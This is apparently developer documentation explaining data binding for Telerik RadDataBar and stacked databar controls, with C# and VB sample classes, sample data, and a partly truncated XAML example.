Some bugs have been fixed in Gold/Legend (inputs, ranking)
Thank you that's great, what has been fixed besides the angle bug?
Hello, I'm now stuck on the 3rd level with a task "Pods will now collide with each other. Pods will forcibly bounce off each other when they come into contact. Additionally, extra maps are now available for racing."
I do not know, how to change program so that it will work. Can you please help me?
Game-wise, you now have to figure out how to calculate collisions and either avoid them, or use them to your advantage.
If your code is crashing, we'll need to see your errors to help.
how do i use the boost keyword
This question has been asked and answered a dozen times in this thread.
Actually, there was a misunderstanding. Nothing has changed on the ranking. Sorry for the wrong announcement and late fix.We could have been more proactive on this one. Don't hesitate to chase us here or me on chat for this kind of issue.
We could have been more proactive on this one. Don't hesitate to chase us here or me on chat for this kind of issue.
Good job on the fix, but this has been known for over 9 months and reported numerous times - in general chat, in french chat, personally to multiple admins in private messages and of course on the forums. I don't know what finally triggered the fix, but it's definitely not just a matter of "chasing" you.
I didn't say nor imply it was. I just think it doesn't hurt.
Sorry again for this being fixed so late.
Can someone please help me with my code? I'm in wood 2 but I cant seem to get it running.
Im programming in python
import sys
import math
# game loop
while True:
x, y, next_checkpoint_x, next_checkpoint_y, next_checkpoint_dist, next_checkpoint_angle = [int(i) for i in input().split()]
opponent_x, opponent_y = [int(i) for i in input().split()]
#distance
if next_checkpoint_dist < 15:
thrust =10
else:
thrust = 100
#angle
if nextCheckpointAngle > 90 or nextCheckpointAngle < -90 then:
thrust -> 0
else:
thrust -> 100
end if
print x y thrust
print(str(next_checkpoint_x) + " " + str(next_checkpoint_y) + "100")
you need to put it as a string
thrust = "BOOST"
Hello, some tips:the distance should be like 1500 instead of 15 ^^ the radius' of the checkpoints themselfs are 600 ^^also you could make the angle where you thrust with 100 a little sharper like 50 and -50one idea is also to turn to the middle of the map like 1k from the checkpoint away already so that you will be able to boost to the next one more efficiently
Crysaac | http://forum.codingame.com/t/coders-strike-back-puzzle-discussion/1833?page=7 | CC-MAIN-2018-30 | en | refinedweb |
The following help documentation for Flex 4 does not appear to be valid when running under AIR (Flex 4.1). Changes to these entries in the style sheet appear to have no effect. Is this a known issue, and/or is there a workaround? I want all of the drag cursors to be mapped to the standard arrow cursor, and want to handle all other feedback via the drag proxy and the drop indicators.
Another (seemingly well known) issue in AIR is that the imageAlpha parameter of DragManager.doDrag() is simply ignored. Previous queries suggest that it was hardcoded to alpha 1.0 (fully opaque), whereas now it seems to be hardcoded to 50 percent. I actually want the previous behavior of fully opaque. Is there a workaround for this issue as well? Most (all?) of the posts on this issue appear to have gone unanswered.
Thanks for any assistance!
From the docs:
The DragManager uses styles to control the display of the different cursors used during the drag and drop operation, such as the move and copy cursors. The cursors are defined as symbols in the Assets.swf file in the flexInstallDir\frameworks\projects\framework\assets directory.
By default, Flex defines the cursor styles as if you had used the following type selector in your application:
<fx:Style> @namespace mx "library://ns.adobe.com/flex/mx"; mx|DragManager { copyCursor: Embed(source="Assets.swf",symbol="mx.skins.cursor.DragCopy"); defaultDragImageSkin: ClassReference("mx.skins.halo.DefaultDragImage"); linkCursor: Embed(source="Assets.swf",symbol="mx.skins.cursor.DragLink"); moveCursor: Embed(source="Assets.swf",symbol="mx.skins.cursor.DragMove"); rejectCursor: Embed(source="Assets.swf",symbol="mx.skins.cursor.DragReject"); } </fx:Style> | https://forums.adobe.com/thread/754792 | CC-MAIN-2018-30 | en | refinedweb |
The day is 09.11.2015 and for all intents and purposes, it seems to be a fairly routine and run of the mill day. But on this inconspicuous day, was the release of SAP Netweaver 7.40 SPS 13. This SPS stack release comprises many new features to the BW platform and is considered a feature release. There has been posts detailing some of the new features and product road map updates, but I find it interesting that not that many people have picked up on or commented on the new feature, Embedded Consolidation.
Previously, it was fairly straight forward. If you wanted to do planning or use the embedded model. You were always limited to only planning, the consolidation model was only available on the BPC standard / Classic which guided your implementation approach, but the reason for my interest and blog post is to draw some attention to this new feature and capability with SAP BW SPS 13, SAP BPC Embedded Consolidation is now possible..
Reference Links –
Having been involved with an implementation of SAP BPC Embedded Model at a large Financial Institution. I have come to appreciate the performance, flexibility and power of the BPC Embedded model. (Please refer to the reference section below to get links to the various posts outlining and detailing the difference between the two model types) . Having the ability of having both a planning and consolidation application that leverage off of the power and performance of PAK, I can say that I am pretty excited about the fact that organizations can now start to harmonize there planning and consolidation environments and leverage off the power of PAK.
I do however believe that customers will have to carefully consider and understand the drivers for deciding which models to use in their implementation. It will require careful consideration especially in light of the technical requirements and skills required for the implementation of the SAP BPC Embedded models.
I do believe that having both embedded models in the same namespace as SAP BW along with the flexibility that the it provides you, is pretty powerful motivation to consider the embedded consolidation model in itself. There is a multitude of scenarios in which having the planning and consolidations cubes in the same multi / composite provider will facilitate reporting and reduce much of the problems of moving data between models. I can remember scenario’s in which having to write tedious script logic to move data between the different models and conversely how incredibly easy it was to see and move data across different models in the embedded model using FOX and as a result of using Multi / Composite providers in the data model design.
In addition, the ability to call SQL in FOX or SQL Exit CR are pretty compelling reasons in itself for choosing the embedded models in solving a lot of the limitations of the classic BPC models. I look forward to seeing more features and functionality being added to the embedded model, along with hearing some of the customer success stories of the new implementations of using the embedded consolidation model.
SAP Support Product Availability Matrix
Reference Links
SAP Notes –
2240919 – Release Note for Netweaver 7.40 SPS13
Thank you for the info Daniel Jacinto
Hi Daniel
Thank You very much for your information and I am very happy for the importance of Consolidation in Embedded version.
< Planning and Consolidation Functions/Features are heart of the BPC irrespective of Versions and Now Embedded is “All in One Solution”>
I am glad that SAP has been recognized Consolidation and brought into Embedded version
Hello Daniel,
Nice information shared. Thanks.
Hi Daniel,
Thank you for the information.
Regards
Great Info Dan.
Cheers
Nikhil
Thank you so much for valuable information. Sorry if it is basic question , how about Equity pickup and Ownership calculation. Are these features part of other SP levels or i am missing something.
Geeta,
Currently in current version of Embedded Consolidation Equity pickup is not supported but I am sure it would come up later sometime.
Regards
Nikhil
Hi Daniel,
It seems I have to upgrade to Embedded version of BPC.
Very good post.
Thanks
Narsi
Nice one Dan.
Hi Daniel,
Just a note, I see this is only due for release 2016 Q2
Cheers,
Andries
Hi Daniel,
thank you for the valuable info. Is someone in the community aware of an official document or website where the consolidation funcionalities of both, embedded and stadard are compared or litsted? Would really appreciate that.
Kind regads,
Boris
Hi Daniel:
Thanks for the Blog and was very helpful.
Have question related to Embedded vs Real-time Consolidation.
1. Can we follow the Note_2243472 to create Embedded Cons model and later will be able to migrate to S/4 Real-time consolidation?.And where can I find the list Infoobject & other object used for S/4 Real-time consolidation.
2.What is the use of Source Infoprovider in the optional section of creating Consolidation model in Embedded?
Regards
Venkatesh | https://blogs.sap.com/2016/02/23/sap-bpc-embedded-consolidation/ | CC-MAIN-2018-43 | en | refinedweb |
Pass onCurrentIndexChanged Event to an object in Page1
Hello everybody,
as explain in "Custom Qlabel show Videocamera on different thread", I made a QtQuick Control application where a QThread is used for displaying camera frames, for not overloading the GUI thread. The application has two pages at the moment, and I pass from one to the other with a SwipeView Type, contained in main.qml.
Basically I need to stop the QThread handled by videocamera object in Page1, when I sift to Page2 and I need to restart it vice versa. Unfortunately in main.qml I cannot see videocamera object, so I don't know how to pass the event onCurrentIndexChanged to videocamera.
Can you enlight me?
SwipeView { id: swipeView anchors.fill: parent currentIndex: tabBar.currentIndex Page1 { } Page2 { } onCurrentIndexChanged: // I want to pass the event to videocamera QtObject contained in Page1, but I don' know how to do it. }
Thank you.
Do you mean something like this ?
SwipeView { id: swipeView anchors.fill: parent Rectangle { color :"green" QtObject{ id:videocamera signal viewIndexChanged(var newIndex) onViewIndexChanged: console.log("signal recived with arg :" + newIndex) } } Rectangle { color: "blue" } onCurrentIndexChanged: videocamera .viewIndexChanged(currentIndex) }
Hello LeLev,
Maybe I've been misunderstood. Below you can find the following files that could help to clarify the situation:
- main.qml, is the main QML file that handle the page changing and show a footer common to all the pages.
- Page1Form.ui.qml, is the QML file where only graphics objects of Page1 are placed.
Page1.qml, is the QML file where only the logic part for Page1 is placed (there is no logic at the moment).
main.qml
ApplicationWindow { visible: true width: 480 height: 320 SwipeView { id: swipeView anchors.fill: parent currentIndex: tabBar.currentIndex Page1 { } Page2 { } } footer: TabBar { id: tabBar width: parent.width height: 35 currentIndex: swipeView.currentIndex TabButton { text: qsTr("Webcam") font.family: "Helvetica" font.pointSize: 13 font.bold: true } TabButton { text: qsTr("Gpio") font.family: "Helvetica" font.pointSize: 13 font.bold: true } } }
Page1Form.ui.qml
Item { id: item1 width: 480 height: 320 Rectangle { id: rectangle anchors.fill: parent RowLayout { id: rowLayout spacing: 2 anchors.top: parent.top anchors.left: parent.left anchors.right: parent.right Videocamera { id: videocamera width: 350 height: 250 x: 0 y: 0 } } } }
The custom object videocamera has been created with c++ code and it's has been registered in main.cpp with the following:
qmlRegisterType<VideoCamera>("VideocameraLib", 1, 0, "Videocamera");
Inside videocamera.cpp there is a QThread. Basically I need to pass in the c++ code, the event that the page has changed. More specifically when the current page is Page1, I need to start the thread, I need to stop it otherwise.
The problem is that main.qml doesn't see the objects contained in Page1Form.ui.qml, so I cannot pass the event to videocamera.cpp.
On the other side, I could easiily pass events from Page1Form.ui.qml to videocamera.cpp since it's its direct child.
Maybe I need to pass the event to Page1 first, and then pass it to videocamera?
Thank you.
@davidino
Hello everyone,
after some time of test, I found a solution. I have to give an id to each page, after that I can access Page1 children as follow:
Page1 { id: pager1 } Page2 { id: pager2 } onCurrentIndexChanged: pager1.videocamera.pageChanged(currentIndex)
Hope that can be useful to someone, maybe it's easy but for me, as a newbie, it required some time.
You can use
SwipeView.isCurrentItemattached property to query whether the page is the current item in view. That way, you can create a nice and clean declarative binding to control whether the camera is active. For example:
Item { id: page1 VideoCamera { active: page1.SwipeView.isCurrentItem } }
Just notice that the SwipeView attached properties are available on the root items of the pages that are added to the view, not on arbitrary grandchildren inside the pages. That is, the root items of Page1 and Page2, not their children.
Hello @jpnurmi
I tried the method that you suggest but it didn't work, the property active doesn't exist (Videocamera is a QQuickPaintedItem, don't know if that the reason) and naming the Item page1, I haven't got SwipeView, see screenshot below.
Let me know if you have any suggestions.
Thank you.
I tried the method that you suggest but it didn't work, the property active doesn't exist (Videocamera is a QQuickPaintedItem, don't know if that the reason)
It was more like a pseudo snippet. We don't know the API of your custom VideoCamera type.
The custom object videocamera has been created with c++ code and it's has been registered in main.cpp...
Based on this, I assumed that the API was in your control. What you do currently to start and stop the video camera is not visible in the above snippets, so I just wrote an imaginary example how it could be controlled in a declarative way, with a simple boolean property in your VideoCamera type.
Hello jpurmi, thank you for your post.
Now I learned the meaning of Q_PROPERTY for creating custom types from C++ code to QML.
I've added the "active" property for Videocamera but, unfortunately, from Page1Form.ui.qml, I cannot see SwipeView.isCurrentItem property contained in main.qml:
import QtQuick 2.7 import QtQuick.Controls 2.0 import QtQuick.Layouts 1.3 import VideocameraLib 1.0 Item { id: page1 width: 480 height: 320 Videocamera { id: videocamera width: 350 height: 250 x: 0 y: 0 active: page1.SwipeView.isCurrentItem // it doesn't see SwipeView, nor id:swipeView of the item in main.qml }
Am I missing something else?
Thank you. | https://forum.qt.io/topic/87039/pass-oncurrentindexchanged-event-to-an-object-in-page1 | CC-MAIN-2018-43 | en | refinedweb |
Visual Basic is quite easy. It gets a lot of flack for being so easy. It makes learning the concepts of programming very simple. I used to be a programming trainer and used the BASIC language as the first stepping stone into the world of software development, and it has worked. It has worked for me, technically.
Let me tell you the boring story: I finished school back in 1996. By that time, my parents had already started a computer college. Needless to say, things were a lot different then. I didn't want to be involved, honestly. Not having many other qualifications basically forced me into it. A few years on, I decided to venture into programming. I attempted to start with Visual C++.
It was horrible. I struggled. Add to that the fact that the book I used was literally full of errors and I had to find the errata online (with dial-up Internet). If it wasn't for Codeguru, I would have ended up somewhere else.
I persisted, even though I had no idea what I was doing. I bought a book about Visual Basic. The language just made it simple enough for me to understand what I was doing. Only after I fully grasped Visual Basic, I could venture back to Visual C++ and understand it better. The funny part is that now I am employed as a C# developer.
Enough about me. The aim of this article is not to bore you; it is to dig into some of the intricacies of Visual Basic. Today you will learn about Scope, Modules, and Accessibility Modifiers in Visual Basic.
Scope
Scope, in programming terms, refers to the visibility of assets. These assets include variables, arrays, functions, classes, and structures. Visibility in this case means which parts of your program can see or use it.
Essentially, there are four levels of scope in Visual Basic. These are:
- Block scope: Available only within the code block in which it is declared
- Procedure scope: Available to all code within the procedure in which it is declared
- Module scope: Available to all code within the module, class, or structure in which it is declared
- Namespace scope: Available to all code in the namespace in which it is declared
Block Scope
A block is a set of statements enclosed within starting and ending declaration statements, such as the following:
- If and End If
- Select and End Select
- Do and Loop
- While and End While
- For [Each] and Next
- Try and End Try
- With and End With
If you declare a variable within a block, such as the above-mentioned examples, you can use it only within that block. In the following example, the scope of the SubTotal variable is the block between the If and End If statements. Because the variable SubTotal has been declared inside the block, you cannot refer to SubTotal when execution passes out of the block.
If Tax > 15.0 Then Dim SubTotal As Decimal SubTotal = Tax * SubTotal 'Correct' End If 'Wrong. Will Not Work Because SubTotal is Out of Scope!' MessageBox.Show(SubTotal.ToString())
Procedure Scope
Procedure scope refers to an an element that is declared within a procedure is not available outside that procedure. Only the procedure that contains the declaration can use it. Variables at this level are usually known as local variables.
In the following example, the variable strWelcome declared in the ShowWelcome Sub procedure cannot be accessed in the Main Sub procedure:
Sub Main() ShowWelcome() Console.WriteLine(strWelcome) 'Will not work!' Console.WriteLine("Press Enter to continue...") Console.ReadLine() End Sub Sub ShowWelcome()] Dim strWelcome = "Hello friend" Console.WriteLine(strWelcome) End Sub
Module Scope
You can declare elements at the Module level by placing the declaration statement outside of any procedure or block but within the module, class, or structure. When you create a variable at module level, the access level you choose determines the scope. More on Access Modifiers later.
Private elements are available to every procedure in that particular module, but not to any code in a different module.
In the following example, all procedures defined in the module can refer to the string variable strWelcome. When the second procedure is called, it displays the contents of the string variable strWelcome in a messagebox.
Private strWelcome As String 'Outside of all Procedures' Sub StoreWelcomeGreeting() strWelcome = "Welcome to the world of Programming" End Sub Sub SayWelcome() MessageBox.Show(strWelcome) End Sub
Namespace Scope
Namespace scope can be thought of as project scope. By declaring an element at module level using either the Friend or Public keyword, it becomes available to all procedures throughout the namespace in which the element is declared. An element available from within a certain namespace also is available from within any namespaces that are nested inside that namespace. Public elements in a class, module, or structure are available to any project that references their project, as well.
If I had changed the declaration of strWelcome (from the previous example) to:
Public strWelcome As String 'Outside of all Procedures'
strWelcome would have been accessible throughout the entire namespace.
Modules
A module is simply a type whose members are implicitly Shared and scoped to the declaration space of the standard module's containing namespace. This means that the entire Namespace can access items in the Module.
Fully Qualified Names
A fully qualified name is an unambiguous name that specifies which function, object, or variable is being referred to. An object's name is fully qualified when it includes all names in the hierarchic sequence above the given element as well as the name of the given element itself.
Members of a standard module essentially have two fully qualified names if:
- One fully qualified name is the name without the standard module name in front.
- One fully qualified name is one including the standard module name.
More than one module in a namespace may contain a member with the same name. Unqualified references to it outside of either module are ambiguous. For example:
Namespace Namespace1 Module Module1 Sub Sub1() End Sub Sub Sub2() End Sub End Module Module Module2 Sub Sub2() End Sub End Module Module Module3 Sub Main() Sub1() 'Valid - Calls Namespace1.Module1.Sub1' 'Valid - Calls Namespace1.Module1.Sub1' Namespace1.Sub1() Sub2() 'Not valid - ambiguous' Namespace1.Sub2() 'Not valid - ambiguous' 'Valid - Calls Namespace1.Module2.Sub2' Namespace1.Module2.Sub2() End Sub End Module End Namespace
Differences Between Modules and Classes
The main difference between Modules and Classes is in the way they store data.
There is never more than one copy of a module's data in memory. This means that when one part of your program changes a public object or variable in a module, and another part subsequently reads that variable, it will get the same value. Classes, on the other hand, exist separately for each instance of the class—for each object created from the class.
Another difference is that data in a module has program scope. This means that the data exists for the entire life of your program; however, class data for each instance of a class exists only for the lifetime of the object.
The last difference is that variables declared as Public in a module are visible from absolutely anywhere in the project, whereas Public variables in a class can only be accessed if you have an object variable containing a reference to a particular instance of a class.
Accessibility Modifiers
The access level of an object is what code has permission to read it or write to it. This level is determined not only by how you declare the object itself, but also by the access level of the object's container. The keywords that specify access level are called access modifiers. Visual Basic includes five (5) Access Levels, and they are:
- Public
- Protected
- Friend
- Protected Friend
- Private
Public
Public indicates that the objects, functions, and variables can be accessed from code anywhere in the same project, or from outside projects that reference the project, and from any assembly built from the project. The next code segment creates a Public Course Class and accesses it from somewhere else in the project:
Public Class Course Public CourseName As String End Class Public Class Student Public Sub Enroll() Dim c As New Course() c.CourseName = "Introduction to Programming" End Sub End Class
Protected
Protected indicates that the objects, variables, and functions can be accessed only from within the same class, or from a class derived from this class. A derived class is simply a class that inherits features from another class, which is called the base class.
The following segment shows that if a class is not derived from a base class, it cannot access its members:
Public Class Course Protected Duration As Integer End Class Public Class ProgrammingCourse Inherits Course Public Sub ChooseCourseDuration() Duration = 12 'OK' End Sub End Class Public Class WebDesignCourse Public Sub ChooseCourseDuration() Dim c As New Course() 'Inaccessible Because of Protection Level' c.Duration = 12 End Sub End Class
Friend
Friend specifies that the objects, functions, and variables can be accessed from within the same assembly, but not from outside the assembly.
Assembly 1
Public Class Course Friend Cost As Double End Class Public Class GraphicDesignCourse Public Sub SetCost() Dim c As New Course() c.Cost = 5000 'OK' End Sub End Class
Assembly2
Public Class BasicCourse Public Sub SetCost() Dim c As New Course() 'Cannot Access from external Assembly' c.Cost = 4000 End Sub End Class
Protected Friend
Protected Friend specify that objects, functions, and variables can be accessed either from derived (inherited) classes or from within the same assembly, or both.
Private
Private indicates that the objects, variables, and functions can be accessed only from within the same module, class, or structure.
Conclusion
Understanding Scope, Modules, and Access Levels is crucial in building any decent application. The sooner you know these, the better.
There are no comments yet. Be the first to comment! | https://www.codeguru.com/vb/gen/vb_misc/algorithms/visual-basic-basics-modules-scope-and-accessibility-modifiers.html | CC-MAIN-2018-43 | en | refinedweb |
Portal Federation with WebLogic Portal WRSP: Advanced IPC Techniques
Abstracting WSRP IPC Session Management
For a small project, having the listener manage the session object directly is both an adequate and acceptable solution. In the case of larger projects (where there will be more developers and/or more IPC over WSRP), it is probably going to be advantageous to have a more generic approach. You may have noticed that your backing file is abstract enough where it can be attached to any portlet listening for any event. You can have this same level of abstraction in the way you retrieve the value. To that end, you will build a light-weight handler to get the value from the on request from the listening portlet, and then remove the value from the session. Such a helper class would look like this:
package article.examples.portal.util.wsrp; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpSession; import org.apache.beehive.netui.pageflow.scoping. ScopedServletUtils; import com.bea.netuix.servlets.controls.portlet.backing. PortletBackingContext; public class IpcDataHandler { public static final String IPC_DATA = ".data"; public static Object getIpcData(HttpServletRequest request) { HttpServletRequest outerRequest = null; HttpSession outerSession = null; Object ipcDataObj = null; PortletBackingContext pbc = null; outerRequest = ScopedServletUtils. getOuterRequest(request); outerSession = outerRequest.getSession(); pbc = PortletBackingContext. getPortletBackingContext(request); ipcDataObj = outerSession.getAttribute (pbc.getInstanceId()+IPC_DATA); if(ipcDataObj!=null) { outerSession.removeAttribute (pbc.getInstanceId()+IPC_DATA); } return ipcDataObj; } }
You then can use this helper in portlet B as follows:
Forward forward = null; IpcDemo1FormBean ipcValue = null; ipcValue = (IpcDemo1FormBean)IpcDataHandler. getIpcData(getRequest()); if(ipcValue!=null) { forward = new Forward("success", ipcValue); } else { forward = new Forward("success"); } return forward;
Look, Ma, No Forms!
There are times when a form submission is not the desired UI design, such as tables of data in portlet A where your listening portlet is only interested in one line or a single value (one example of this would be Yahoo! Or Google Finance in a portfolio view). In this case, the Netui tags provide a convenient way to pass these values without a form:
<netui:anchor <netui:parameter IPC Link Example 1 </netui:anchor>
The ipcDemoCall2 action in portlet A then puts the value into an event as follows:
import com.bea.netuix.servlets.controls.portlet.backing. PortletBackingContext; private static final String IPC_VALUE = "ipcValue"; @Jpf.Action(forwards = { @Jpf.Forward(name = "success", path = "index.jsp") }) public Forward ipcDemoCall2() { Forward forward = new Forward("success"); PortletBackingContext context = null; HttpServletRequest outerRequest = null; outerRequest = ScopedServletUtils. getOuterRequest(getRequest()); context = PortletBackingContext. getPortletBackingContext(outerRequest); context.fireCustomEvent("loadIpcExample2B", getRequest().getParameter(IPC_VALUE)); return forward; }
In this case, the value is simply a String rather than an object. Fortunately, you have created your generic helper to not care what kind of object is packed into the payload, so you can continue to pick up the value in the same way you handled it earlier.
Page Switching with WSRP
Earlier, you set up your event listening so that it would not matter whether the listening portlet was displayed or not:
<netuix:handleEvent<< | https://www.developer.com/lang/article.php/10924_3749366_2/Portal-Federation-with-WebLogic-Portal-WRSP-Advanced-IPC-Techniques.htm | CC-MAIN-2018-43 | en | refinedweb |
Can anyone help me. I have been bangin my head on this one for two days. variable number may not have been initialized. code to enter single digit number and return largest of ten. code is as follows.
// Java packages import javax.swing.JOptionPane; public class Counter { // main method begins execution of Java application public static void main( String args[] ) { // declare variables int counter; // loop counter String number; // number entered by user double number2 = 0; // number converted to integer double largest = 0; // largest of all numbers entered for( counter = 0; counter < 10; counter++ ) number = JOptionPane.showInputDialog( "Enter a single digit number: "); number2 = Double.parseDouble( number ); if ( number2 > number2) largest = number2; JOptionPane.showMessageDialog( null, largest + " is the largest"); } } | https://www.daniweb.com/programming/software-development/threads/13376/error-variable-might-not-have-been-initialized | CC-MAIN-2018-43 | en | refinedweb |
Visual Studio 2015 Preview was recently released along with .NET 4.6 and contains many new and exciting features like support for cross platform development in C++, an open-source .NET compiler platform, Cordova Tooling, ASP.NET 5, IDE enhancements for Web development and much more. You can download Visual Studio 2015 Preview from the following link -
In this article, we will be looking at some Debugging enhancements done in Visual Studio 2015, while comparing the same with Visual Studio 2013. We will also look at few new introductions in debugging the C# and VB.NET languages as well.
Let’s get started by creating a blank solution in Visual Studio 2013 as well as Visual Studio 2015, and then do the comparison between these two by writing a couple of programs.
Step 1: Create a blank solution with the name VisualStudio2013DebugDemo and VisualStudio2015DebugDemo under Visual Studio 2013 and Visual Studio 2015 respectively.
Step 2: Add a class library with the name SalesLibrary in both the Visual Studio solutions and rename the class name as SalesCalculation.
Step 3: Add a SalesNetProfit function under both the Class Libraries available in VS 2013 and VS 2015. Write the following code in SalesNetProfile:
public class SalesCalculation
{
public double SalesNetProfit(double COGS, double Expenses, double ActualSales)
{
return ActualSales - (COGS + Expenses);
}
}
Step 4: Now use this SalesLibrary into a Console Application. Add a Console application under both Visual Studio with the name “SalesCalculatorUI” and add a reference to the SalesLibrary in SalesCalculatorUI. Your solution should look like the following:
Step 5: Now consume this SalesLibrary and call a SalesNetProfit function in our console application. Repeat this code in both VS 2013 and 2015. The code is shown here:
static void Main(string[] args)
{
SalesLibrary.SalesCalculation calci = new SalesLibrary.SalesCalculation();
double netProfit = calci.SalesNetProfit(2000, 4000, 16000);
Console.WriteLine("Sales Net Profit is - $ {0}", netProfit);
Console.ReadKey();
}
Step 6: Add a break point on the SalesNetProfit function in a class library under Visual Studio 2013 as well as Visual Studio 2015 and observe the break point:
In Visual Studio 2015, Microsoft has added a better experience for setting additional information about the break points with a short cut to Settings and Disable Breakpoint as shown above. If you want this functionality in Visual Studio 2013, you will have to right click and disable the breakpoint or go to settings using the Context menu. Let’s observe the Context menu for both VS 2013 and 2015. It is shown below:
If you observe the context menu in both VS 2013 and VS 2015, you will find a clean and better experience with the latter as the Condition, Hit Count and other options are now moved to the Settings menu item in VS 2015. Let’s click on Settings in the VS 2015context menu . A separate window called Breakpoint Settings appears which allows you to set the Conditions and Actions as shown here:
Check the Conditions check box which will allow you to set the conditions for your Breakpoint. For example, I want to hit the breakpoint if my actual sales is below $ 1000. Look at the Conditions options as shown here:
You can see that you can now set conditions for the breakpoint. You can set Hit Count to execute the breakpoint and you can apply the filters in a nice, easy-to-use interface.
In Conditions, you can set multiple conditions as per your requirements, with the option to edit the code by keeping the Breakpoint settings option on.
You will also find some useful intellisense in the expression window as shown here:
I have set a couple of conditions in my Conditions section which you can find by downloading the source code (look at the bottom of this article). Run the code and observe the breakpoints by changing the values we are passing to our function and making the sales net profit less than 1000.
You can also add actions when the breakpoint is executed. For example, printing the values in the Output window could be the best way to watch values. The values which you want to print from the program must be enclosed in {} curly brackets. In our example, we have used {netProfit} as shown here:
The output of this action can be viewed in the Output Window:
Please note that these are not new options. These were there in the previous versions of Visual Studio. But with Visual Studio 2015, the accessibility of these features has become much simpler.
Step 7: Now let’s add a LINQ-To-SQL class in Visual Studio 2015 in SalesLibrary and write a function that will return some data from the Northwind database. I already have SQL Server 2012 installed and Northwind database preconfigured on my machine. If you don’t have that setup, install it before moving ahead.
Now drag and drop a couple of tables from the Northwind database using Server Explorer.
Step 8: Let’s add a function which will fetch the customers and their orders in our SalesCalculation library. The code is as shown here:
NorthwindDataContext dataContext = new NorthwindDataContext();
public List<Customer> FetchCustomer()
{
var customers = dataContext.Customers.ToList();
return customers;
}
In the above code we are returning Customers from customers table of Northwind database. Now if you would like to debug this code and add some conditions or assumptions, you will have to first change the code and then run it to observe the changes.
In Visual Studio 2015, while debugging the code, we can now write queries [LINQ Query/Lambda Expression] targeting the data in the Immediate Window or Watch Window. Yes you can debug Lambda expressions too! Let’s try some of them.
Let’s add a breakpoint on the return statement and execute the code by calling the function in our main method of the console application. When the breakpoint is hit, open the Watch window if it’s not already opened and write the LINQ query to see the result. The output is as shown here:
Now if you perform the same operation in Visual Studio 2013, you will see the following output:
This is a cool new feature introduced for C# and VB.NET developers which allows us to now write queries and test the output or perform some assumptions during debugging of our programs.
Now let’s see the same query in the Immediate Window. Run the program and when the breakpoint is hit, open Immediate Window and write the following code and see the results:
So with these new enhanced debugging features introduced in Visual Studio 2015, the accessibility of the different options during debugging and querying the data is now possible; which was not so easily accesibly or possible in Visual Studio 2013. At the end, these new features makes a developer’s life much simpler.
We will explore some more features in our forthcoming articles. Stay tuned!
Download the entire source code of this article (Github) | https://www.dotnetcurry.com/visualstudio/1059/debugging-visual-studio-2015 | CC-MAIN-2018-43 | en | refinedweb |
Create entity placeholder objects in a HAM
#include <ha/ham.h> ham_entity_t *ham_entity( const char *ename, int nd, unsigned flags); ham_entity_t *ham_entity_node( const char *ename, const char *nodename, unsigned flags);
libham
These functions are used to create placeholders for entity objects in a HAM. The ham_entity_node() function is used when a nodename is used to specify a remote HAM instead of a node identifier (nd).
You can use these functions to create entities, and associate conditions and actions with them, before the process associated with an entity is started (or attached). Subsequent ham_attach*() calls by entities can attach to these placeholder and thereby enable conditions and actions when they occur.
The nd variable specifies the node identifier of the remote node at the time the call is made.
The ham_entity_node() function takes as a parameter a fully qualified node name (FQNN).
An entity handle, or NULL if an error occurred (errno is set).
In addition to the above errors, the HAM returns any error it encounters while servicing this request. | http://www.qnx.com/developers/docs/6.6.0_anm11_wf10/com.qnx.doc.ham/topic/hamapi/ham_entity.html | CC-MAIN-2018-43 | en | refinedweb |
DataBinding
Databinding for the RadDataBar control involves the correlation between the business logic/data, and the visualization of the control.
The DataBinding involves the following three properties:
ItemsSource (a property of RadStackedDataBar and RadStacked100Databar): Gets or sets the data source used to generate the content of the databar control. Elements can be bound to data from a variety of data sources in the form of common language runtime (CLR) objects and XML - see the list of the supported data sources bellow.
Value (a property of RadDataBar): Expects a value which will be used to determine the size of the bar.
ValuePath (a property of RadStackedDataBar and RadStacked100DataBar): Expects the name of the property from the underlying datasource, which will determine the value of each bar in the stack.
You can bind the ItemsSource of RadStackedDataBar and RadStacked100DataBar to any class that implements the IEnumerable interface.
RadDataBar will automatically update its size if the value it is bound to changes. For this to happen the underlying data context must implement the INotifyPropertyChanged interface.
RadStackedDataBar and RadStacked100DataBar also provide full support for change notifications - data sources that implement the INotifyCollectionChanged, and underlying data items that implement INotifyPropertyChanged are properly tracked and automatically reflected by the UI.
You'll see the binding in action below.
Let's create a sample class with four properties - two integers, a collection of integers and a collection of another class.
Example 1: The Product class
public class Product { public int Value1 { get; set; } public int Value2 { get; set; } public IEnumerable<int> Ints { get; set; } public IEnumerable<Item> Items { get; set; } } public class Item { public double Val { get; set; } public string Name { get; set; } }
Public Class Product Public Property Value1() As Integer Public Property Value2() As Integer Public Property Ints() As IEnumerable(Of Integer) Public Property Items() As IEnumerable(Of Item) End Class Public Class Item Public Property Val() As Double Public Property Name() As String End Class
The next step is to set values for the properties in our class.
Example 2: Sample data
var items = new List<Item>() { new Item{ Val = 9, Name = "nine", }, new Item{ Val = 10, Name = "ten", }, new Item{ Val = 11, Name = "eleven", }, new Item{ Val = 20, Name = "twenty", }, new Item{ Val = 22, Name = "twenty two", }, new Item{ Val = 90, Name = "ninety", }, new Item{ Val = -9, Name = "-nine", }, new Item{ Val = -10, Name = "-ten", }, new Item{ Val = -11, Name = "-eleven", }, new Item{ Val = -20, Name = "-twenty", }, new Item{ Val = -100, Name = "-hundred", }, }; this.DataContext = new Product() { Value1 = 20, Value2 = 30, Ints = new List<int>() {5, 6, 7, 8, 9, }, Items = items };
Dim items = New List(Of Item)() From { New Item With {.Val = 9, .Name = "nine"}, New Item With {.Val = 10, .Name = "ten"}, New Item With {.Val = 11, .Name = "eleven"}, New Item With {.Val = 20, .Name = "twenty"}, New Item With {.Val = 22, .Name = "twenty two"}, New Item With {.Val = 90, .Name = "ninety"}, New Item With {.Val = -9, .Name = "-nine"}, New Item With {.Val = -10, .Name = "-ten"}, New Item With {.Val = -11, .Name = "-eleven"}, New Item With {.Val = -20, .Name = "-twenty"}, New Item With {.Val = -100, .Name = "-hundred"}} Dim TempProduct As Product = New Product() With {.Value1 = 20, .Value2 = 30, .Ints = New List(Of Integer)() From {5, 6, 7, 8, 9}, .Items = items} Me.DataContext = New Product() With {.Value1 = 20, .Value2 = 30, .Ints = New List(Of Integer)() From {5, 6, 7, 8, 9}, .Items
The only thing left to do is to create our databar(s) and bind them using the properties exposed for the purpose (as mentioned in the beginning of the article).
Example 3: Define RadDataBars
<telerik:RadDataBar <telerik:RadDataBar <telerik:RadStackedDataBar <telerik:RadStackedDataBar
